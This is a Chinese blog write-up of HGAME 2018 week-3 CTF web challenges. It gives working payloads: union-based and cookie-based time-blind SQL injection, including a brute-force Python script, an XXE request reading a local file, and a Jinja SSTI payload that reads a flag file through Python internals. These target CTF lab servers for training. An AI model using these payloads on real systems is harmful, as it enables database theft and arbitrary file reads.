hgame-2018 CTFwp(杭电信安)week3

最新推荐文章于 2024-03-07 21:38:17 发布
最新推荐文章于 2024-03-07 21:38:17 发布
阅读量1.4k 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qingchenldl/article/details/79436206
版权

送分的sqli

这题没有任何过滤什么的,真的是很简单了。 

1 and 1=-1 union select 1,schema_name from information_schema.schemata

查看库名,得:

1    information_schema
1    test
1    week3_sqliiii2
?id=1 and 1=-1 union select 1,table_name from information_schema.tables

查表,得:

。。。
1    test
1    f111aa4g
1    users

猜测在f111aa4g里:

查列名

?id=1 and 1=-1 union select 1,column_name from information_schema.columns
1    f111aaaggg_w3
1    username

猜测在f111aaaggg_w3里。
最后payload: 

http://118.25.18.223:10068/?id=-1 union select 1,f111aaaggg_w3 from  f111aa4g

得到flag。

正常的SQLi

描述
出题人终于换端口了 我们来一发正常的SQLi吧
URL http://123.206.203.108:10010/normalSQLi/index.php
基准分数 250
当前分数 250
完成人数 39

表哥提醒:cookie时间盲注
抓包发现cookie值:

Cookie: name=Z3Vlc3Q%3D; isadmin=0

有源码泄露:http://123.206.203.108:10010/normalSQLi/index.php.bak 

<?php
.....

$username = base64_decode($_COOKIE['name']);

.....

$sql = "select * from user where username = '{$username}'";
$re = mysqli_query($conn, $sql);
$rs = mysqli_fetch_array($re);

// echo $rs['flag'];
echo $username . '<br/>';
echo "因为出题人太懒了,所以现在没有任何功能";

.....

cookie的name是注入点,base64编码。

用的是表哥的脚本: 

import requests
import base64
import urllib
url = "http://123.206.203.108:10010/normalSQLi/index.php"
flag = ""
for i in range(1,1000):
    for j in range(33,127):
        payload = "admin' or if((ascii(substr((select flag from user limit 2,1),%s,1))=%s),sleep(3),false)#"%(i,j)
        cookie = {
            "name":urllib.quote(base64.b64encode(payload))
        }
        try:
            r = requests.get(url=url,cookies=cookie,timeout=2.5)
        except:
            flag +=chr(j)
            print flag
            break

flag: hgame{fLag_1s_h4re…..}

书店

XXE xml实体注入

ENTITY 实体
在一个甚至多个XML文档中频繁使用某一条数据,我们可以预先定义一个这条数据的“别名”,即一个ENTITY,然后在这些文档中需要该数据的地方调用它。
XML定义了两种类型的ENTITY,一种在XML文档中使用,另一种作为参数在DTD文件中使用。

ENTITY的定义语法:

<!DOCTYPE  文件名 [
    <!ENTITY  实体名 "实体内容">
    ]>

大概看了一些文档,理解了一下,尝试:

POST /hgame/selectBook?type=dz HTTP/1.1
Host: 120.79.208.173:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/xml
Referer: http://120.79.208.173:8080/hgame/index.jsp
Cookie: JSESSIONID=08CEBA8F1F775DC3EA34F98711AB9D89
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

<!DOCTYPE netspi [<!ELEMENT methodname ANY><!ENTITY xxe SYSTEM "file:///a/b/flag.txt">]>
<root>
<search>type sth!</search>
<value>&xxe;</value>
</root>

但是无果。可能还是没太弄懂这个姿势。

ngc’s blog

表哥提示STTI,于是了解了一些文档

‘.class 可以访问到字符串的类型对象

使用 mro(Method Resolution Order) 直接获得对象的继承链, python用这个方法来确定对象方法解析的顺序

subclasses()来获得当前环境下能够访问的所有对象.

接下来的做法有点像sql注入(查表) 

''.__class__
Oops! That page doesn't exist.
http://111.230.105.104:5000/<type 'str'>
''.__class__.__mro__
Oops! That page doesn't exist.
http://111.230.105.104:5000/(<type 'str'>, <type 'basestring'>, <type 'object'>)

mark
找到file,
然后读取:

{{''.__class__.__mro__[2].__subclasses__()[40]('./flag', 'r').read()}}

flag: hgame{skdvhdsbvadvnjVADBVS}

「已注销」
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF hgame2018_flag_server
weixin_45441024的博客
11-28 425
BUUCTF hgame2018_flag_server 下载附件之后永远都是先check一下 紧接着我们将其拖入IDA中查看一下: int __cdecl main(int argc, const char **argv, const char **envp) { unsigned int v3; // eax@13 int result; // eax@20 int v5; // ecx@20 int v6; // [sp+8h] [bp-60h]@6 int v7; // [sp
hgame-2018 CTFwp电信)week2
苟有恒,必有三更眠,五更起。
03-04 770
草莓社区-1 描述 flag在../flag.php中 知识点:LFI URL http://118.25.18.223:10011/ 基准分数 100 当前分数 100 完成人数 118 提示很清楚,简单的本地包含: payload: http://118.25.18.223:10011/show_maopian.php?mao=../flag.ph
HGAME 2018 Web Week2 Random?
柠檬木有枝
10-21 568
题目描述 提示 vim 改代码,vim 会生成 swp 文件以防止出错是恢复,直接 dowm 下 swp 文件恢复源码,这里比较坑的一点是完整的文件名是.random.php.swp。 恢复过后 random.php 源码如下 要求传入一串对象的序列化内容,而且这个对象的两个变量会被赋予随机值,要求这两个变量的值相等方能getflag。 起初考虑了一下觉得是反序列化漏洞,但是却不存在魔术方法...
hgame2018_flag_server
z1r0的博客
03-01 339
hgame2018_flag_server 查看保护 v10为1就可以cat flag。 这题的漏洞点出在了read_n这里,当a2为-1时,可以输入很长的一个数值。 输入的数据和要覆盖的数据差了0x40。 攻击思路:用-1输入长数据,放0x40的无用数据第0x41这里放入1即可。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if deb
[BUUCTF-pwn]——hgame2018_flag_server
Y_peak的博客
04-03 345
[BUUCTF-pwn]——hgame2018_flag_server 保护开启了 NX和canary 看下反汇编,只要v10非0就可以得到flag, 也就是v6 = v8,但是显然v8是一个随机数, 并且没有找到可以修改的地方。 仔细观察上面的代码,一旦v5为负数,我们就可以无限输入了,并且s1距离v10为0x40 = 64, 我们只需要输入0x40个字符就可以开始修改v10了 exploit from pwn import * p = remote("node3.buuoj.cn",28128) p
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础题目也就不是太难为人,看成数据处理的考点也做的出来...
HGAME cdcollector-开源
04-24
这是现有项目cdcollector的mod,用于为拥有过多数据库的人使用phpmysql存储您的HGAMES数据库。
0hgame:用0h制作的游戏->阅读README
05-01
)2- DO NOT TOUCH BLACK THINGS IF YOU DONT WANT TO START AGAIN3- Try to reach the other side of the window to became the king of the penguins4- Enjoy it. (it is a rule, so if you are not enjoying the ...
hgame:Haskell 游戏引擎
05-30
游戏 Haskell 游戏引擎
3D模型图片查看器(可查看3D程序模型)
11-03
包括很多以前Hgame图片模型查看工具,包括很多.x或者.ars等文件
hgame2019 week1 wp
qq_42192672的博客
02-02 833
这次新搭了gitpage+hexo的博客 wp第一次就放在上面啦 链接:https://woaixiaoyuyu.github.io/2019/01/30/hgame2019-week1-wp/#more
hgame-2018 CTFwp电信)week1
苟有恒,必有三更眠,五更起。
03-04 3030
原题链接 由于开放时间短,不知道什么时候结束。我会将题目的大致内容以图片形式down下来。 web1 Are you from Europe? URL http://123.206.203.108:10001/European.html 一看题,就感觉想是用burp抓包做,来自欧洲,就想到改语言,accept-langue字段。 但是,我试了en,gk等等值,并没有什么卵用。而且发现
HgameCTF 2024 web&misc wp
最新发布
Nanian233的博客
03-07 767
HgameCTF 2024 web&misc 个人wp
hgame2023 Web&Misc
qq_61768489的博客
02-09 1803
hgame2023 Web&Misc
AXL经典作品推荐恋する乙女と守护の楯 恋爱少女与守护之盾
热门推荐
大师的资源
08-19 2万+
专题: 本博客恋爱类和galgame(Hgame)游戏资源链接汇总 恋する乙女と守护の楯 ▼ 游戏名称 恋する乙女と守护の楯 参考中文名:恋爱少女与守护之盾 ▼ 制作商 AXL(アクセル) ▼ 对应操作系统 Win2000/XP ▼ 发售日 2007/06/29-----------------------------------------
电CTF 练习题RE WP
qq_42192672的博客
10-24 3776
密码 1. BAABAABBAAAAAAAABABBABABBBAABABAABBABBBAABBABAABAA 提示:答案是十个字母 直接培根密码解密 RE 1. Beat our dice game and get the flag 拖进IDA太乱了,但可以找到关键字符串,拖进OD查看 显然最后要达成的就是31337然后获得flag,规则是掷色子,试试看能不能爆破 一路单步执...
[BUUCTF] 备赛刷题第二天
Dannie01的博客
11-03 1807
刷题目录[WUSTCTF2020]CV Maker[RootersCTF2019]I_<3_Flask拓宽思路 多多尝试常见SSTI的payload收集官方漏洞利用方法WAF绕过新姿势:[CISCN2019 华东南赛区]Double Secret做题思路总结[NPUCTF2020]ezinclude【预期解】【非预期解】做题思路总结 [WUSTCTF2020]CV Maker 漏洞源码: from flask import Flask, render_template_string, request
Hgame-WP 2023 部分题解
DoubleLiii的博客
02-01 283
题解
2022---hgame第一周WriteUp
3tefanie丶zhou的博客
02-02 4235
【请不要把陌生人的些许善意,视为珍稀的瑰宝,却把身边亲近人的全部付出,当做天经地义的事情,对其视而不见。】
请你完善上面的代码 添加从E:\Desktop\2024hgame\week1\crypto\奇怪的图片\png_out文件夹里面获取图片的功能
02-04
以下是完善代码的示例,添加...folder_path = "E:/Desktop/2024hgame/week1/crypto/奇怪的图片/png_out" # 获取文件夹中的图片 images = get_images_from_folder(folder_path) # 在代码中使用获取到的图片 # ... ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值